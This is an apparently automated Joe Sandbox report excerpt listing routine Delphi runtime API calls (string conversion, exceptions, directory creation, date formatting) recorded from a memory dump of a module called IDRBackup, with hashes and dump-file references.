                                                                                                  • API ID: Character@$Unicode$System@$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$CategoryCheckNumber$qqr26$Ascii$qqrbAsg$qqrr20Category$qqrx20Except$qqrvException@$bctr$qqrp20Latin1$qqrbRaiseRecpx14RecxiStringiStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 3637202406-0
                                                                                                  • Opcode ID: 751393710e930eb27405fe4e3e94953a572777632971053491e119f22829623a
                                                                                                  • Instruction ID: f3a2b83f937e7c586b9c85763bdedaf6e99525fe08e3eea42222651124a940af
                                                                                                  • Opcode Fuzzy Hash: 751393710e930eb27405fe4e3e94953a572777632971053491e119f22829623a
                                                                                                  • Instruction Fuzzy Hash: CF41F230A001899BDF11DFA5EC925AEB7F5AF04300F904AB6E580E7242D7B09E82D790
                                                                                                  APIs
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001BDF4
                                                                                                    • Part of subcall function 500266E0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500266EA
                                                                                                    • Part of subcall function 500266E0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 500266FA
                                                                                                    • Part of subcall function 500266E0: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 50026705
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001BE04
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  • @Sysutils@ExcludeTrailingPathDelimiter$qqrx20System@UnicodeString.RTL120(00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001BE0F
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001BE1A
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001BE37
                                                                                                  • @Sysutils@DirectoryExists$qqrx20System@UnicodeString.RTL120(00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001BE51
                                                                                                    • Part of subcall function 5001BD98: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000001,5001BE56,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001BD9D
                                                                                                    • Part of subcall function 5001BD98: GetFileAttributesW.KERNEL32(00000000,00000001,5001BE56,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001BDA3
                                                                                                  • @Sysutils@ExtractFilePath$qqrx20System@UnicodeString.RTL120(00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001BE64
                                                                                                    • Part of subcall function 5001C610: @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(?,?,00000001,5001BE69,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001C61E
                                                                                                    • Part of subcall function 5001C610: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,00000001,5001BE69,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001C62F
                                                                                                  • @System@@UStrEqual$qqrv.RTL120(00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001BE6F
                                                                                                    • Part of subcall function 5000A45C: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000000), ref: 5000A3B7
                                                                                                    • Part of subcall function 5000A45C: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000000), ref: 5000A3CC
                                                                                                    • Part of subcall function 5000A45C: @System@@LStrArrayClr$qqrpvi.RTL120(00000000,00000000), ref: 5000A44F
                                                                                                  • @Sysutils@ExtractFilePath$qqrx20System@UnicodeString.RTL120(00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001BE81
                                                                                                  • @Sysutils@ForceDirectories$qqr20System@UnicodeString.RTL120(00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001BE89
                                                                                                  • @Sysutils@CreateDir$qqrx20System@UnicodeString.RTL120(00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001BE95
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$String$System@@$Sysutils@$AnsiFileFromStr$qqrr20Stringx27System@%T$us$i0$%$Delimiter$qqrx20ExtractPath$qqrx20Raise$AfterArrayAsg$qqrr20AttributesChar$qqrx20ClassClassoClr$qqrpviConstruction$qqrp14Copy$qqrx20CreateCreate$qqrp17Dir$qqrx20Directories$qqr20DirectoryEqual$qqrvError$qqrucExcept$qqrvException@$bctr$qqrp20ExcludeExists$qqrx20ForceInternalLastList$qqrvLoadMetaObjectPathString$qqrp20StringiiStringt1Stringx20Trailing
                                                                                                  • String ID:
                                                                                                  • API String ID: 2306203679-0
                                                                                                  • Opcode ID: 56a2d1a22aa08b1fbeaa17cbbf80d16e66359434df9b90dacc96891ee287758f
                                                                                                  • Instruction ID: 50c6019c4f89038e0e7c76c75c5a4f51b8fbce8d55c1420a97c27fa388cfb9c6
                                                                                                  • Opcode Fuzzy Hash: 56a2d1a22aa08b1fbeaa17cbbf80d16e66359434df9b90dacc96891ee287758f
                                                                                                  • Instruction Fuzzy Hash: 2531D534A01289DFDF04EFA4ED829DDB3F4EF94200F6046A6E60097212D770EE85DB80
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50023929), ref: 5002385E
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50023929), ref: 50023891
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50023929), ref: 500238A0
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000200,00000000,50023929), ref: 500238B4
                                                                                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000200,00000000,50023929), ref: 500238C0
                                                                                                  • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000200,00000000,50023929), ref: 500238C6
                                                                                                  • @System@@UStrFromWArray$qqrr20System@UnicodeStringpbi.RTL120(00000000,00000004,?,00000000,?,00000200,00000000,50023929), ref: 500238DC
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,00000004,?,00000000,?,00000200,00000000,50023929), ref: 5002390E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$System@@$String$Asg$qqrr20Stringx20$Array$qqrr20Char$qqrx20Copy$qqrx20DateFormatFromLocaleStringiiStringpbiThread
                                                                                                  • String ID: $yyyy
                                                                                                  • API String ID: 1172944777-404527807
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50022C71), ref: 50022BA6
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50022C71), ref: 50022BD9
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50022C71), ref: 50022BE8
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000100,00000000,50022C71), ref: 50022BFC
                                                                                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,50022C71), ref: 50022C08
                                                                                                  • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,50022C71), ref: 50022C0E
                                                                                                  • @System@@UStrFromWArray$qqrr20System@UnicodeStringpbi.RTL120(00000000,00000004,?,00000000,?,00000100,00000000,50022C71), ref: 50022C24
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,00000004,?,00000000,?,00000100,00000000,50022C71), ref: 50022C56
                                                                                                  Strings
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$System@@$String$Asg$qqrr20Stringx20$Array$qqrr20Char$qqrx20Copy$qqrx20DateFormatFromLocaleStringiiStringpbiThread
                                                                                                  • String ID: $yyyy
                                                                                                  • API String ID: 1172944777-404527807
                                                                                                  APIs
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5000BF16), ref: 5000BC02
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000BF16), ref: 5000BC2B
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000BF16), ref: 5000BC7F
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000BF16), ref: 5000BD60
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000BF16), ref: 5000BEDB
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unicode$StringSystem@System@@$AnsiFromInternalStr$qqrr20Stringx27System@%T$us$i0$%$EnsureString$qqrr20
                                                                                                  • String ID:
                                                                                                  • API String ID: 2573053487-0
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001092F,?,?), ref: 500107DE
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001092F,?,?), ref: 500107FB
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001092F,?,?), ref: 50010833
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,5000FDAE,00000000,5001092F,?,?), ref: 50010864
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,5000FDAE,00000000,5001092F,?,?), ref: 50010869
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001092F,?,?), ref: 50010886
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,5001092F,?,?), ref: 50010892
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001092F,?,?), ref: 500108B3
                                                                                                  • @Character@TCharacter@ConvertToUtf32$qqrx20System@UnicodeStringi.RTL120(00000000,5001092F,?,?), ref: 500108CB
                                                                                                  • @Character@TCharacter@Initialize$qqrv.RTL120(00000000,5001092F,?,?), ref: 500108DB
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$StringSystem@@$Character@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Asg$qqrr20ConvertExcept$qqrvException@$bctr$qqrp20Initialize$qqrvLatin1$qqrbRaiseRecpx14RecxiStringiStringx20Sysutils@Utf32$qqrx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 1571831625-0
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,?,?,5001AD11,00000000,5001ADED), ref: 5001ABA9
                                                                                                  • @Sysutils@AnsiStrScan$qqrpbb.RTL120 ref: 5001ABD0
                                                                                                  • @Sysutils@AnsiStrScan$qqrpbb.RTL120 ref: 5001ABEB
                                                                                                  • @Sysutils@StrEnd$qqrpxb.RTL120 ref: 5001ABFE
                                                                                                  • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5001AC30
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5001AC41
                                                                                                    • Part of subcall function 5000A0CC: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A0EC
                                                                                                    • Part of subcall function 5000A0CC: @System@@ReallocMem$qqrrpvi.RTL120(?,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A10D
                                                                                                    • Part of subcall function 5000A0CC: @System@@LStrClr$qqrpv.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A128
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120 ref: 5001AC4B
                                                                                                  • @Sysutils@AnsiStrScan$qqrpbb.RTL120 ref: 5001AC56
                                                                                                  • @System@Move$qqrpxvpvi.RTL120 ref: 5001AC7C
                                                                                                  • @Sysutils@AnsiStrScan$qqrpbb.RTL120 ref: 5001AC99
                                                                                                  • @Sysutils@StrEnd$qqrpxb.RTL120 ref: 5001ACAC
                                                                                                  • @System@Move$qqrpxvpvi.RTL120 ref: 5001ACC7
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$Sysutils@Unicode$Ansi$Scan$qqrpbb$String$End$qqrpxbFromMove$qqrpxvpvi$Asg$qqrr20CharChar$qqrx20Clr$qqrpvLen$qqrr20Length$qqrr20Mem$qqrrpviReallocStr$qqrr20StringiStringpbiStringx20Stringx27System@%T$us$i0$%
                                                                                                  • String ID:
                                                                                                  • API String ID: 392231086-0
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50011688), ref: 5001158A
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011688), ref: 500115A7
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011688), ref: 500115DF
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,50011688), ref: 50011610
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50011688), ref: 50011615
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011688), ref: 50011632
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,50011688), ref: 5001163E
                                                                                                  • @Character@TCharacter@CheckSymbol$qqr26Character@TUnicodeCategory.RTL120(00000000,50011688), ref: 50011653
                                                                                                  • @Character@TCharacter@GetUnicodeCategory$qqrx20System@UnicodeStringi.RTL120(00000000,50011688), ref: 50011661
                                                                                                  • @Character@TCharacter@CheckSymbol$qqr26Character@TUnicodeCategory.RTL120(00000000,50011688), ref: 50011666
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Character@Unicode$System@$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$CategoryCheckSymbol$qqr26$Asg$qqrr20Category$qqrx20Except$qqrvException@$bctr$qqrp20Latin1$qqrbRaiseRecpx14RecxiStringiStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 3532062273-0
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5000FDD0), ref: 5000FCD2
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000FDD0), ref: 5000FCEF
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000FDD0), ref: 5000FD27
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,5000FDD0), ref: 5000FD58
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,5000FDD0), ref: 5000FD5D
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000FDD0), ref: 5000FD7A
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,5000FDD0), ref: 5000FD86
                                                                                                  • @Character@TCharacter@CheckLetterOrDigit$qqr26Character@TUnicodeCategory.RTL120(00000000,5000FDD0), ref: 5000FD9B
                                                                                                  • @Character@TCharacter@GetUnicodeCategory$qqrx20System@UnicodeStringi.RTL120(00000000,5000FDD0), ref: 5000FDA9
                                                                                                  • @Character@TCharacter@CheckLetterOrDigit$qqr26Character@TUnicodeCategory.RTL120(00000000,5000FDD0), ref: 5000FDAE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@@LStrAddRef$qqrpv.RTL120 ref: 5000D365
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5000D41B), ref: 5000D37C
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5000D41B), ref: 5000D3A1
                                                                                                    • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,5000D41B), ref: 5000D3B6
                                                                                                  • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000000,5000D41B), ref: 5000D3BF
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,00000000,5000D41B), ref: 5000D3C8
                                                                                                  • @System@Utf8ToUnicode$qqrpbuipcui.RTL120(00000000,00000000,5000D41B), ref: 5000D3D1
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,00000000,5000D41B), ref: 5000D3E2
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5000D41B), ref: 5000D3EE
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5000D41B), ref: 5000D3F8
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(5000D422), ref: 5000D415
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@@LStrAddRef$qqrpv.RTL120 ref: 5000D27D
                                                                                                  • @System@@WStrClr$qqrpv.RTL120(00000000,5000D32F), ref: 5000D292
                                                                                                    • Part of subcall function 50009588: SysFreeString.OLEAUT32(?), ref: 50009596
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5000D32F), ref: 5000D2B7
                                                                                                    • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                  • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120(00000000,5000D32F), ref: 5000D2CC
                                                                                                  • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000000,5000D32F), ref: 5000D2D5
                                                                                                  • @System@@WStrToPWChar$qqrx17System@WideString.RTL120(00000000,00000000,00000000,5000D32F), ref: 5000D2DE
                                                                                                  • @System@Utf8ToUnicode$qqrpbuipcui.RTL120(00000000,00000000,5000D32F), ref: 5000D2E7
                                                                                                  • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120(00000000,00000000,5000D32F), ref: 5000D2F8
                                                                                                  • @System@@WStrClr$qqrpv.RTL120(00000000,00000000,5000D32F), ref: 5000D302
                                                                                                  • @System@@WStrAsg$qqrr17System@WideStringx17System@WideString.RTL120(00000000,00000000,5000D32F), ref: 5000D30C
                                                                                                  • @System@@WStrClr$qqrpv.RTL120(5000D336), ref: 5000D321
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(5000D336), ref: 5000D329
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @Sysutils@ExceptionErrorMessage$qqrp14System@TObjectpvpbi.RTL120(00000800), ref: 500264B1
                                                                                                    • Part of subcall function 500262D0: VirtualQuery.KERNEL32(?,?,0000001C,00000000,5002647C), ref: 50026303
                                                                                                    • Part of subcall function 500262D0: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 50026327
                                                                                                    • Part of subcall function 500262D0: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 50026342
                                                                                                    • Part of subcall function 500262D0: @Sysutils@AnsiStrRScan$qqrpbb.RTL120(?,?,00000105), ref: 50026366
                                                                                                    • Part of subcall function 500262D0: @Sysutils@StrLCopy$qqrpbpxbui.RTL120(?,?,00000105), ref: 5002637B
                                                                                                    • Part of subcall function 500262D0: @System@@IsClass$qqrp14System@TObjectp17System@TMetaClass.RTL120(?,?,00000105), ref: 50026392
                                                                                                    • Part of subcall function 500262D0: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,00000105), ref: 5002639E
                                                                                                    • Part of subcall function 500262D0: @Sysutils@StrLen$qqrpxb.RTL120(?,?,00000105), ref: 500263A7
                                                                                                    • Part of subcall function 500262D0: @System@FindResourceHInstance$qqrui.RTL120(0000FFD6,?,00000100,?,?,00000105), ref: 500263D7
                                                                                                    • Part of subcall function 500262D0: LoadStringW.USER32(00000000,0000FFD6,?,00000100), ref: 500263DD
                                                                                                    • Part of subcall function 500262D0: @System@TObject@ClassName$qqrv.RTL120(?,?,00000105), ref: 500263EA
                                                                                                    • Part of subcall function 500262D0: @Sysutils@StrLFmt$qqrpbuit1px14System@TVarRecxi.RTL120(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,00000105), ref: 50026454
                                                                                                  • @System@Flush$qqrr15System@Textfile.RTL120(00000800), ref: 500264C5
                                                                                                  • @System@@_IOTest$qqrv.RTL120(00000800), ref: 500264CA
                                                                                                  • CharToOemW.USER32(?,?), ref: 500264DF
                                                                                                  • @Sysutils@StrLen$qqrpxc.RTL120(?,00000000,00000800), ref: 500264F2
                                                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000800), ref: 50026502
                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000800), ref: 50026508
                                                                                                  • GetStdHandle.KERNEL32(000000F4,50026578,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000800), ref: 5002651D
                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,50026578,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000800), ref: 50026523
                                                                                                  • @System@FindResourceHInstance$qqrui.RTL120(0000FFD7,?,00000040,00000800), ref: 5002653F
                                                                                                  • LoadStringW.USER32(00000000,0000FFD7,?,00000040), ref: 50026545
                                                                                                  • MessageBoxW.USER32(00000000,?,?,00002010), ref: 5002655E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500114E2), ref: 500113BB
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500114E2), ref: 500113D8
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500114E2), ref: 50011410
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,500114E2), ref: 50011441
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,500114E2), ref: 50011446
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500114E2), ref: 50011463
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500114E2), ref: 5001148D
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500114E2), ref: 500114AC
                                                                                                  • @Character@TCharacter@IsSurrogatePair$qqrxbxb.RTL120(00000000,500114E2), ref: 500114BC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
